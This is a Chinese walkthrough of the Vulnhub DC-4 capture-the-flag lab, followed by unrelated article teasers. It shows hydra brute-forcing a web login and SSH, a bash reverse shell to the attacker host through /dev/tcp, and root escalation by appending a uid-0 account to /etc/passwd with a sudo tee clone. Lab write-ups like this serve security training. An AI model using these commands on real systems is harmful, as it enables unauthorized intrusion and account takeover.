Vulnhub DC-4靶机渗透

news2024/11/17 13:43:32

环境准备

DC-4靶机 ip:???????

kali攻击机 ip:192.168.153.128

一、信息收集

kali攻击机中,使用 arp-scan -l 扫描c段(-l为扫描c段)确定靶机IP地址为192.168.153.129

对目标靶机使用nmap端口扫描

nmap -sV 192.168.153.129 扫描靶机开放端口(-sV探测服务软件的版本)

探测到目标开放了22端口和80端口,访问目标80端口,发现是一个登录页面,随便尝试登陆一下,发现登录失败不会有任何提示。sql注入貌似也不存在。使用gobuster 扫一下目标目录。

gobuster dir -u http://192.168.153.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php

发现这几个目录想要访问都需要先登录。。。。唉,最不愿意的东西,那就爆破登录吧。。

二、hydra爆破密码

因为登录页面的一句“Admin Information Systems Login”登录用户名大概率admin没跑了,根据网站目录扫描结果,可以推测登录成功后会跳转到/command.php页面,也许页面有command这个单词,尝试用hydra的登录成功提示进行扫描。

备注:密码本是网上找的

hydra -l admin -P 133127.txt 192.168.153.129 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"

爆破得到admin的密码为happy,登录一下,成功登录

点击command,跳转到/command.php页面,点击run,发现执行了系统命令

三、利用RCE(远程代码执行)漏洞getshell

打开bp抓包,抓取run的数据包,发送到repeater模块

在kali开启8888监听端口

nc -nlvp 8888

bash -c 'exec bash -i &>/dev/tcp/192.168.153.128/8888 <&1'在burp的decoder模块进行URL编码(攻击机IP)

用编码后的结果替代radio的值并发送

kali攻击机成功获取到www-data的shell

进去溜达溜达左右看看,在/home目录下发现三个用户目录

在/home/jim/backups目录下有个叫old-passwords.bak的文件,里面有很多密码串

在靶机上/home/jim/backups目录下用python3起http服务

python3 -m http.server 9999

kali攻击机上用wget下载old-passwords.bak

wget http://192.168.153.129:9999/old-passwords.bak

获得密码本备份后,使用hydra尝试爆破jim的ssh登录密码

hydra -l jim -P old-passwords.bak ssh://192.168.153.129

以用户名jim,密码jibril04进行登录,成功登录靶机

使用sudo -l 发现jim账户无法sudo

在/home/jim目录下,有个mbox文件,查看文件,是一封来自root的邮件看看内容没什么有用的

有没有其他邮件呢?全局搜索mail相关的文件和文件夹

find / -name mail 2>/dev/null

在/var/mail和/var/spool/mail有一封相同的邮件,文件名叫jim,内容如下,从图中可见,charles的密码是^xHhA&hvim0y

切换到charles账户

四、sudo tee提权

切换到charles,然后执行sudo -l发现charles可以以root身份执行/usr/bin/teehee

由于/usr/bin/teehee是个自创命令,因此可以先执行/usr/bin/teehee --help来看看这个命令怎么使用

从命令帮助来看,这个应该就是tee命令的副本,功能和tee命令是一样的

试试用tee命令的提权方法来提权:

在靶机的/etc/passwd文件中新增一个用户fancy,密码为123456,其他都和root用户一致,具体操作如下

1)在攻击机上用openssl生成写入passwd的用户的密码md5散列

openssl passwd -1 -salt dc4 123456

得到$1$dc4$et4u0w92ZYIY4bsJE/gJG0

2)在靶机/etc/passwd文件中新增用户fancy

echo 'fancy:$1$dc4$et4u0w92ZYIY4bsJE/gJG0:0:0:root:/root:/bin/bash' | sudo /usr/bin/teehee -a /etc/passwd

3)su - fancy密码为刚刚设置的123456成功提权到root

进入root以后去找找新发现吧,在/root下,发现一个flag.txt文件

cat flag.txt成功找到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/186259.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

自动驾驶——智能配电

一、汽车配电 汽车配电&#xff08;Power Distrubition Unit&#xff0c;PDU&#xff09;分为低压配电与高压配电&#xff0c;即低压PDU与高压PDU。 二、传统控制方式——PCB式电器盒 传统配电盒&#xff08;机电器件&#xff09;&#xff1a; &#xff08;1&#xff09;继…

为什么要做黑盒测试?黑盒测试有什么作用?

对于软件测试的从业者来说&#xff0c;黑盒测试是十分重要的测试方式&#xff0c;它可以弥补白盒测试检查不到的部分。可能刚刚入门的测试小白&#xff0c;对于为什么要做黑盒测试&#xff1f;黑盒测试有什么作用&#xff1f;仍然抱有很大的疑问。下面小编就来从黑盒测试的概念…

QT入门Buttons之QPushButton

目录 一、界面布局介绍 1、布局器中的位置及使用 2、控件的界面属性 3、常用基本属性介绍 3.1控件名称 3.2控件大小属性 3.3按钮上的文字设置 3.4设置按钮的样式 二、属性功能介绍 1、常用方法介绍 2、基本信号介绍 三、Demo展示 一、界面布局介绍 1、布局器中的位…

丰田埃尔法商务租车价格是多少,它的性能到底有多好呢

丰田埃尔法作为MPV之王。埃尔法的高腰线和深色玻璃也使内部更具神秘感&#xff0c;惹眼闪烁的进气格栅&#xff0c;类似盔甲一般的全镀铬饰条构成的霸道前脸和富于设计感的车身曲线&#xff0c;细节处采用36颗闪亮镀铬装饰点缀&#xff0c;有着很高的辨识性。保持了典型的MPV风…

需要代理上网的linux服务器,无法使用NTP同步时间,只需要这一行指令即可。

这将会是一篇让你对时间同步受益匪浅的文章&#xff01;如果你看完之后有收获&#xff0c;希望你能加个关注&#xff0c;如果你看完之后没有收获&#xff0c;希望你能留下你路过的痕迹。 由于工作需要&#xff0c;我们使用了一款神奇的调度框架&#xff0c;叫powerjob&#xff…

【职工管理系统】C++全栈体系(十四)

职工管理系统 第七章 添加职工 功能描述&#xff1a;批量添加职工&#xff0c;并且保存到文件中 一、功能分析 分析&#xff1a; 用户在批量创建时&#xff0c;可能会创建不同种类的职工 如果想将所有不同种类的员工都放入到一个数组中&#xff0c;可以将所有员工的指针维…

组织级过程资产库如何助力CMMI3-5级高效落地?

为了助力CMMI3-5级高效落地&#xff0c;近日CoCode旗下Co-ProjectV3.0智能项目管理平台全面升级&#xff0c;CMMI落地4大工具正式上线&#xff1a;CMMI成熟度自测工具、量化管理工具&#xff08;组织级过程改进工具和量化项目管理工具&#xff09;、组织级过程资产库。 组织级过…

tomcat下载安装步骤(笔记整理)

目录Tomcat下载安装以及配置&#xff08;详细教程&#xff09;tomcat下载安装步骤&#xff08;超详细&#xff09;Apache Tomcat下载、安装、配置图文教程Tomcat下载安装配置详细过程Tomcat下载及配置&#xff08;IDEA&#xff09;Tomcat 下载安装教程Linux系统中Tomcat下载安装…

振弦采集模块配置工具VMTool 扩展功能数据处理

振弦采集模块配置工具VMTool 扩展功能数据处理 数据存储 数据存储功能模块支持自动或手动将实时数据寄存器值存储到数据库&#xff0c; 并支持导出为 Excel文件功能。 &#xff08; 1&#xff09; 手动存储 每点击数据存储面板内的【 手动存储】按钮一次&#xff0c;将当前寄存…

Spring Cloud_Gateway新一代网关

目录一、概述简介1.官网2.是什么3.能干嘛4.微服务架构中网关在哪里二、三大核心概念1.Route(路由)2.Predicate&#xff08;断言&#xff09;3.Filter(过滤)4.总体三、Gateway工作流程1.官网总结2.核心逻辑&#xff1a;路由转发执行过滤器链四、入门配置1.新建Module2.POM3.YML4…

模板征集活动正式上线 | 加入我们,共创可视化内容!

本活动是由EasyV官方发布举办的定向主题模板征集活动&#xff0c;用户报名参加并使用EasyV进行创作后&#xff0c;通过素材广场上传作&#xff0c;经由官方进行作品评估&#xff0c;取得奖次的用户即可获得相应奖励。活动面向EasyV所有产品用户&#xff0c;以作品为维度独立参与…

tomcat下载与安装win11

目录 一、下载Tomcat及解压 1、选择下载版本&#xff08;本文选择tomcat 10版本为例&#xff09; 2、之后选择解压到任意一个盘&#xff0c;我解压到D盘&#xff0c;解压的路径一定要记住&#xff0c;后面系统环境变量配置的时候要用到。 二、配置环境 三、验证是否配置成功…

jvm 堆 栈大小设置

1、Eclise 中设置jvm内存: 改动eclipse的配置文件,对全部project都起作用 改动eclipse根文件夹下的eclipse.ini文件 -vmargs //虚拟机设置 -Xms40m //初始内存 -Xmx256m //最大内存 -Xmn16m //最小内存 -XX:PermSize128M //非堆内存 -XX:MaxPermSize256M 2、Eclise 中设置jvm内…

mybatis-plus02

目录一、乐观锁二、查询构造器三、分页查询四、逻辑删除五、Mybatis的应用一、乐观锁 配置示例&#xff1a; 在数据库表中加入version字段&#xff0c;表示数据版本号 修改实体类&#xff0c;在使用类中加入对应的version字段&#xff0c;并使用是乐观锁 //乐观锁 Version pr…

数据结构 第六章 二叉树与树(二叉树的性质)

玫瑰少年&#xff1a;点击收听 1 基本知识点 1、根结点&#xff1a;在一棵树中&#xff0c;(唯一)一个没有前驱的结点 2、叶子结点&#xff1a;在一棵树中&#xff0c;没有后继的结点 3、结点的度&#xff1a;是指结点后继的数量 4、树的度&#xff1a;是指所有结点度的最大值…

VMware ESXi 6.7 U3 Unlocker OEM BIOS 集成 REALTEK 网卡驱动和 NVMe 驱动 (集成驱动版)

ESXi-6.7.0-20221004001 Build 20497097 请访问原文链接&#xff1a;https://sysin.org/blog/vmware-esxi-6-sysin/&#xff0c;查看最新版。原创作品&#xff0c;转载请保留出处。 作者主页&#xff1a;www.sysin.org VMware ESXi 6.7.0 Update 3 Build 20497097 Unlocker &…

[Vulnhub] DC-7

下载链接&#xff1a;https://download.vulnhub.com/dc/DC-7.zip git信息泄露Drupal-CMS 拿shellnc反弹shell反弹shell写入root用户的cron定时任务&#xff0c;root执行提权 目录 <1> 信息搜集 (1) nmap扫靶机ip&端口服务 (2) github上DC-7项目信息泄露 <2&g…

洛谷 P1417 烹调方案 01背包题解 动态规划

真的好久没有写题解了 上次写还是在上次呢 先赞后看好习惯&#xff01; 昨天打了一月份的USACO(美国信奥赛) 给我一个感触&#xff08;也算是感想吧&#xff09;&#xff1a; 我是蒟蒻 我是蒟蒻 我是蒟蒻 我是蒟蒻 水内容&#xff08;&#xff09; 言归正传看今天这道题 题…

电脑键盘打字错乱怎么办?按键混乱的5种解决方法

有人问电脑无故乱打字&#xff0c;明明按的正确的键&#xff0c;打出来的却是错误的字母。换个键盘是不是就能解决呢&#xff1f; 不过如果你的手边恰好没有新键盘&#xff0c;又立刻要用电脑&#xff0c;可以先试试下面的5种方法。 重新连接键盘和电脑禁用键盘上的Num Lock运…

爬虫进阶(web逆向之b站)

文章目录 简介分析nowh5获取动态参数模拟 now模拟 h5小结简介 前面在《web逆向初步》练习了一些 JS 加密操作,这篇进入基础实战部分,通过给b沾刷播放量的例子,体会逆向的作用!当然,这里不是恶意刷流量,而是通过程序模拟一个正常用户,给视频增加一次播放量分析 一个正常用…